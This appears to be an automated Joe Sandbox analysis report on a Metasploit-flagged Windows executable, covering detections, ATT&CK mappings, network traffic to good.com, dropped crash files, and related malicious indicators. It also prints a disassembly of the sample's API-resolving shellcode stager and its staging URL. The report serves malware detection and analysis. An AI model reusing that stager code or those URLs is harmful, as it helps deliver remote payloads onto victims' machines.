Source: Yara match | File source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK matrix (numbers in parentheses are the badge counts shown in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook
Defense Evasion: Process Injection (1); DLL Side-Loading (1); Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery (11); System Information Discovery (1); Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Ingress Tool Transfer (2)
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
Behavior Graph (ID 1636969; sample: 443_2003_https-df.exe; start date: 13/03/2025; architecture: WINDOWS; score: 96): 443_2003_https-df.exe started, connected to good.com (74.82.86.0, port 443, local port 49683, RIMBLACKBERRYCA, Canada) and then started WerFault.exe. Signatures shown on the graph: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 4 other signatures.

Source | Detection | Scanner | Label
443_2003_https-df.exe | 78% | Virustotal |
443_2003_https-df.exe | 84% | ReversingLabs | Win64.Hacktool.MetaSploit
443_2003_https-df.exe | 100% | Avira | TR/Crypt.XPACK.Gen7
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
https://cdn123.offseccdn.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
good.com | 74.82.86.0 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://cdn123.offseccdn.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S | false | Avira URL Cloud: safe | unknown
http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7 | 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.3.dr | false | | high
https://www.blackberry.com | 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160429536.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160712596.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000003.1076984923.00000000005DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://good.com/ | 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
74.82.86.0 | good.com | Canada | 18705 | RIMBLACKBERRYCA | false
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1636969
                          Start date and time:2025-03-13 09:47:13 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 37s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:443_2003_https-df.exe
                          Detection:MAL
                          Classification:mal96.troj.winEXE@2/6@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 67%
                          • Number of executed functions: 4
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 40.69.147.202, 20.190.159.131, 23.199.214.10, 4.175.87.197
                          • Excluded domains from analysis (whitelisted): onedsblobvmssprdcus02.centralus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:48:42 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                          No context
Match: good.com
Associated Sample Name / URL | Detection | Threat Name | Context
SecuriteInfo.com.Win32.SpywareX-gen.27164.12067.exe | malicious | SystemBC | 52.60.87.163
https://kissingwills555.github.io/teethteeth | malicious | Outlook Phishing, HTMLPhisher | 108.179.193.59
https://down.acting-good.com/ | malicious | Unknown | 104.21.89.148
http://linkangood.com/21ef897172770ca75d.js | malicious | Unknown | 5.149.254.180
http://linkangood.com | malicious | Unknown | 5.149.254.210
https://www.nireos.com/hyperspectral-imaging/ | malicious | Unknown | 5.149.254.180
https://www.google.com/url?sa=i&url=https%3A%2F%2Fwww.nireos.com%2Fhyperspectral-imaging%2F&psig=AOvVaw1JYEwI4H49LZPOWn9fTBOI&ust=1706902416150000&source=images&cd=vfe&opi=89978449&ved=0CBMQjRxqFwoTCKjlrZXxioQDFQAAAAAdAAAAABAE | malicious | Unknown | 5.149.254.210
Match: RIMBLACKBERRYCA
Associated Sample Name / URL | Detection | Threat Name | Context
yakov.spc.elf | malicious | Mirai | 216.9.249.37
z0r0.x86.elf | malicious | Mirai | 68.171.249.33
g4za.x86.elf | malicious | Unknown | 68.171.249.25
mpsl.elf | malicious | Unknown | 67.223.68.118
loligang.ppc.elf | malicious | Mirai | 208.93.75.245
arm5.nn.elf | malicious | Mirai, Okiru | 206.124.114.77
loligang.arm.elf | malicious | Mirai | 68.171.237.10
m68k.elf | malicious | Unknown | 67.223.69.122
la.bot.arm5.elf | malicious | Mirai | 68.171.237.27
sora.mips.elf | malicious | Mirai | 67.223.69.118
Match: 37f463bf4616ecd445d4a1937da06e19 (JA3 SSL client fingerprint)
Associated Sample Name / URL | Detection | Threat Name | Context
faktura_FV2025020637756.html | malicious | Unknown | 74.82.86.0
SecuriteInfo.com.FileRepMalware.26489.28570.exe | malicious | Unknown | 74.82.86.0
Bill Of Ladding & PL AWB No.1669134316.vbs | malicious | GuLoader | 74.82.86.0
Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | 74.82.86.0
FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs | malicious | Remcos, GuLoader | 74.82.86.0
4500149631.vbe | malicious | GuLoader, Snake Keylogger | 74.82.86.0
comprobante de pago.exe | malicious | GuLoader | 74.82.86.0
comprobante de pago.exe | malicious | GuLoader | 74.82.86.0
yJLckVp9HE.exe | malicious | FatalRAT, GhostRat, Nitol | 74.82.86.0
                          No context
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0024690629542772
                          Encrypted:false
                          SSDEEP:192:G03w+Tukcq0kigMJNOjZThGzuiFQZ24lO8pGw:z3PTukcxkigvjizuiFQY4lO8Yw
                          MD5:C9310E05E3D7E4820A5D100A2FF53974
                          SHA1:F7E01B17A802A1B1D69F0F20EEA32EF27E6847B9
                          SHA-256:FCB2B7F3549BA1086B637C032595EC367B518C49D4F8A8F3F1ABA6DBCA236DDF
                          SHA-512:E266C00CA636D4B193F0D92449855BFF7235643E99DC0B1A56A74E75DF0078A91A35A4D4CEC8D2D048819221880CEBCBA4316A2C68FCB985ADCCB8A6F4CA7EFF
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.2.9.3.1.4.4.3.1.2.3.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.2.9.3.1.5.0.0.9.3.5.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.0.0.f.c.0.1.-.a.5.f.b.-.4.5.0.5.-.8.e.3.4.-.f.2.e.c.d.f.3.9.c.c.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.2.b.f.4.b.d.-.3.f.f.c.-.4.2.9.e.-.9.5.9.b.-.0.f.b.c.4.8.1.c.2.f.a.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.4.4.3._.2.0.0.3._.h.t.t.p.s.-.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.0.4.-.0.0.0.1.-.0.0.1.8.-.9.8.d.0.-.1.3.b.2.f.4.9.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.2.6.6.3.5.8.5.1.8.7.a.0.b.2.c.d.1.c.4.4.a.2.6.6.2.e.9.9.c.3.0.0.0.0.f.f.f.f.!.0.0.0.0.4.0.5.4.b.e.8.8.7.9.b.4.5.8.c.0.3.4.3.4.0.b.1.9.3.1.1.b.a.a.4.2.2.1.8.c.2.1.6.d.!.4.4.3._.2.0.0.3._.h.t.t.p.s.-.d.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Mini DuMP crash report, 14 streams, Thu Mar 13 08:48:34 2025, 0x1205a4 type
                          Category:dropped
                          Size (bytes):149324
                          Entropy (8bit):1.4891538757814387
                          Encrypted:false
                          SSDEEP:384:vAS7GmDclnQwv//vl2qnvRWi0IeEZSkFrgYy6syQaEjork:4gRsnQwH/nZWi0FwF/y6syQaEjork
                          MD5:3215E0294E86B565B2FE3F2B648A4F69
                          SHA1:56B76251EB533F220136788A62EAFC08FA00715D
                          SHA-256:E7564559044064DFF21A360DCD16C3EC3E0DEF922EEEF4D12FAD722AF2719DE0
                          SHA-512:F31A492278E0836697767A9A4D75851F7B831AA6B897E3B99A28C8DC632BFD441D79F8F9D159F408B8C2923F7B0E11044306407AE6686E0947C2D61160954DE3
                          Malicious:false
                          Reputation:low
                          Preview:MDMP..a..... .........g.........................................^..........T.......8...........T............F..t............ ..........|"..............................................................................eJ.......#......Lw......................T.............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8800
                          Entropy (8bit):3.70785656086467
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJvx0a6YKCKgmf+4bdpDt89blCGy0fW3m:R6lXJJ56YvKgmf+BlCGJfn
                          MD5:7FE14344C9D2F175A3D3FABBDDF6F509
                          SHA1:3773A4C9ECB7F39BEF623392D8C055B034DFFB2F
                          SHA-256:6BE7A3CA288E669CEC3C608F4A78E3D8F060915E880C9A3D28732518FEFB1490
                          SHA-512:2CC234D2EC5FBFF965C8AEAFFB6BCF63DDD9ACD679116C957FE9599108DEA2B2D3656175117E1191D01A06777D0DBB7895E537C86414519929E9EBB835462DDF
                          Malicious:false
                          Reputation:low
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.2.0.<./.P.i.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4719
                          Entropy (8bit):4.502213460567407
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsGJg771I9daWpW8VYFYm8M4JDAOKFByq85kLOeLLBJ8d:uIjfcI7Ob7V9J81lZLdJ8d
                          MD5:9BD85AA9BEFAF1061F4A35563EE02C5D
                          SHA1:80E8B848B1BEA88547A18C6C4952590908C9064D
                          SHA-256:C5CD3A6B873D38B50523429F197B7F9C1E7A013D506F333380B52B19D7985B8A
                          SHA-512:ED2B7ABAE1B6CD4225B58E466AEC965258C8207FED21A1FC1AD61ACE4FF12725E960CC31C6B10DB6CBD97BDA381701057E0690B7B299B6E863328037BAF49E9F
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="758871" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.398660495630439
                          Encrypted:false
                          SSDEEP:6144:X/4fiJoH0ncNXiUjt10q7G/gaocYGBoAWQqZaK7FIeC/FacXMMYfY8a:v4vF7MY6WQqYVtbcMc
                          MD5:47998880EC7914FF94A9E08DD82CE61B
                          SHA1:DC532EE2E960D1968241F7E7E608E5EC2461239D
                          SHA-256:AD237E7E1C08DE8B09ECC4009D4DCD2900858C9EE7D5C4101C2CD8C4EEDDF7E6
                          SHA-512:6D3B347EED576BBA446CC6AF9BBFCD476C9C8166D7000D88501377491A31A632421556391F0C03C4C3A994C41C4CF6EFBA19408BF6EE48E47F45450EE26FD9AC
                          Malicious:false
                          Reputation:low
                          Preview:regfJ...J....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....f...............................................................................................................................................................................................................................................................................................................................................6..9........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):32768
                          Entropy (8bit):3.7645686670896703
                          Encrypted:false
                          SSDEEP:768:lZrDoy6VGYxDdwRx2baNWG0bBAmpsIL1c+YRM:lZ5YzwW8n
                          MD5:BAD7EBB9A66BA3B375B333BEE35AA2B0
                          SHA1:DC41FC14C831B9E9B8DA7053A39BCA8A8210337D
                          SHA-256:C73FCC75346234ED1FA785C8185618FAF9D81632577AE431E5DEC89D7BC5B18C
                          SHA-512:40DAF9028D784846DD4723777E9470B5114EA0619CB63B5657DFD27667E1787905DD5AA79273D61D61D5AE7A053766058C9897EFC3A411698D57D4E81BF25BC9
                          Malicious:false
                          Reputation:low
                          Preview:regfI...I....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....f...............................................................................................................................................................................................................................................................................................................................................0..9HvLE.n......I....`......kI.j5.H...............`............... .......@... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........G...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...
                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                          Entropy (8bit):1.7373895378352873
                          TrID:
                          • Win64 Executable GUI (202006/5) 92.65%
                          • Win64 Executable (generic) (12005/4) 5.51%
                          • Generic Win/DOS Executable (2004/3) 0.92%
                          • DOS Executable Generic (2002/1) 0.92%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:443_2003_https-df.exe
                          File size:7'168 bytes
                          MD5:8d9c0f42baf129d1b430a01463dd7870
                          SHA1:4054be8879b458c034340b19311baa42218c216d
                          SHA256:b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
                          SHA512:02831aafecd02359f63e8f13f50835ccd1e76abfd23b9586156351ca3ce5f7e1cb9846a6c64f538c9a9c9d2b96a0317a10ae5b6ef4631d67b30da61ba3b8db02
                          SSDEEP:24:eFGStrJ9u0/6ikY/nZd8rBQAV2G1Y+HKkn2DOIRwQ78IW29buoR9svcJBepmB:is0mYb4BQWq+H7CO1Q7PWAqoRikJDB
                          TLSH:D2E1B32372391CF6C89C463B4A63D04B65489B347F27E3FA8B14020FB9F201139B1C86
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9$..}E..}E..}E..Z...~E..}E~..E..t=..|E..t=..|E..Rich}E..................PE..d...}<.K..........#......0...........@.........@...
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x140004000
                          Entrypoint Section:.jcho
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x4BC63C7D [Wed Apr 14 22:06:53 2010 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:b4c6fff030479aa3b12625be67bf4914
                          Instruction
                          cld
                          dec eax
                          and esp, FFFFFFF0h
                          call 00007EFF0CE85E81h
                          inc ecx
                          push ecx
                          inc ecx
                          push eax
                          push edx
                          push ecx
                          dec eax
                          xor edx, edx
                          push esi
                          dec eax
                          mov edx, dword ptr [edx+60h]
                          dec eax
                          mov edx, dword ptr [edx+18h]
                          dec eax
                          mov edx, dword ptr [edx+20h]
                          dec eax
                          movzx ecx, word ptr [edx+4Ah]
                          dec eax
                          mov esi, dword ptr [edx+50h]
                          dec ebp
                          xor ecx, ecx
                          dec eax
                          xor eax, eax
                          lodsb
                          cmp al, 61h
                          jl 00007EFF0CE85DB4h
                          sub al, 20h
                          inc ecx
                          ror ecx, 0Dh
                          inc ecx
                          add ecx, eax
                          loop 00007EFF0CE85D9Fh
                          push edx
                          inc ecx
                          push ecx
                          dec eax
                          mov edx, dword ptr [edx+20h]
                          mov eax, dword ptr [edx+3Ch]
                          dec eax
                          add eax, edx
                          cmp word ptr [eax+18h], 020Bh
                          jne 00007EFF0CE85E28h
                          mov eax, dword ptr [eax+00000088h]
                          dec eax
                          test eax, eax
                          je 00007EFF0CE85E19h
                          dec eax
                          add eax, edx
                          inc esp
                          mov eax, dword ptr [eax+20h]
                          mov ecx, dword ptr [eax+18h]
                          dec ecx
                          add eax, edx
                          push eax
                          jecxz 00007EFF0CE85E08h
                          dec eax
                          dec ecx
                          inc ecx
                          mov esi, dword ptr [eax+ecx*4]
                          dec ebp
                          xor ecx, ecx
                          dec eax
                          add esi, edx
                          dec eax
                          xor eax, eax
                          lodsb
                          inc ecx
                          ror ecx, 0Dh
                          inc ecx
                          add ecx, eax
                          cmp al, ah
                          jne 00007EFF0CE85DA3h
                          dec esp
                          add ecx, dword ptr [esp+08h]
                          inc ebp
                          cmp ecx, edx
                          jne 00007EFF0CE85D8Ah
                          pop eax
                          inc esp
                          mov eax, dword ptr [eax+24h]
                          dec ecx
                          add eax, edx
                          inc cx
                          mov ecx, dword ptr [eax+ecx*2]
                          inc esp
                          mov eax, dword ptr [eax+1Ch]
                          dec ecx
                          add eax, edx
                          inc ecx
                          mov eax, dword ptr [eax+ecx*4]
                          dec eax
                          add eax, edx
                          inc ecx
                          pop eax
                          inc ecx
                          pop eax
                          pop esi
                          pop ecx
                          pop edx
                          inc ecx
                          pop eax
                          inc ecx
                          pop ecx
                          inc ecx
                          pop edx
                          dec eax
                          sub esp, 20h
                          inc ecx
                          Programming Language:
                          • [IMP] VS2005 build 50727
                          • [ASM] VS2008 SP1 build 30729
                          • [LNK] VS2008 SP1 build 30729
Data directories (Name / Virtual Address / Virtual Size / Is in Section)
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0      0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x4358   0x6c   .jcho
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0      0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0      0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0      0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x43c8   0x8    .jcho
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0      0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0      0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0      0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0      0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0      0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0      0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x3000   0x18   .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0      0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0      0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0      0x0
Sections (Name / Virtual Address / Virtual Size / Raw Size / MD5 / Xored PE / ZLIB Complexity / File Type / Entropy / Characteristics)
.text   0x1000  0x104e  0x1200  a4a5deae25708a9e05f50bcad7075c86  False  0.025390625   data  0.16810049402497224  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x3000  0x84    0x200   31b58e4b44359a1fdeebdccbe8f7a423  False  0.158203125   data  0.9669929845987311   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.jcho   0x4000  0x3d0   0x400   d3df8e69479d1cf00626de02acc9eeda  False  0.8193359375  data  6.142036294099521    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports (DLL / Import)
KERNEL32.dll  VirtualAlloc, ExitProcess


                          • Total Packets: 12
                          • 443 (HTTPS)
                          • 53 (DNS)
TCP packets (Timestamp / Source Port / Dest Port / Source IP / Dest IP)
Mar 13, 2025 09:48:31.447102070 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:31.447150946 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:31.447246075 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:31.477185965 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:31.477202892 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:33.947495937 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:33.947597980 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:34.067949057 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:34.067984104 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:34.068376064 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:34.068433046 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:34.071067095 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:34.116317987 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:34.636802912 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:34.636934996 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:34.636964083 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:34.637008905 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:34.637648106 CET  49683  443    192.168.2.9  74.82.86.0
Mar 13, 2025 09:48:34.637698889 CET  443    49683  74.82.86.0   192.168.2.9
Mar 13, 2025 09:48:34.637756109 CET  49683  443    192.168.2.9  74.82.86.0

UDP packets (Timestamp / Source Port / Dest Port / Source IP / Dest IP)
Mar 13, 2025 09:48:31.420587063 CET  49227  53     192.168.2.9  1.1.1.1
Mar 13, 2025 09:48:31.439805984 CET  53     49227  1.1.1.1      192.168.2.9
DNS queries (Timestamp / Source IP / Dest IP / Trans ID / OP Code / Name / Type / Class / DNS over HTTPS)
Mar 13, 2025 09:48:31.420587063 CET  192.168.2.9  1.1.1.1  0x402d  Standard query (0)  good.com  A (IP address)  IN (0x0001)  false

DNS answers (Timestamp / Source IP / Dest IP / Trans ID / Reply Code / Name / CName / Address / Type / Class / DNS over HTTPS)
Mar 13, 2025 09:48:31.439805984 CET  1.1.1.1  192.168.2.9  0x402d  No error (0)  good.com  (none)  74.82.86.0  A (IP address)  IN (0x0001)  false
                          • cdn123.offseccdn.com
HTTPS session (Session ID / Source IP / Source Port / Destination IP / Destination Port / PID / Process)
0  192.168.2.9  49683  74.82.86.0  443  2820  C:\Users\user\Desktop\443_2003_https-df.exe
HTTP traffic (Timestamp / Bytes transferred / Direction / Data)
2025-03-13 08:48:34 UTC  346 bytes  OUT
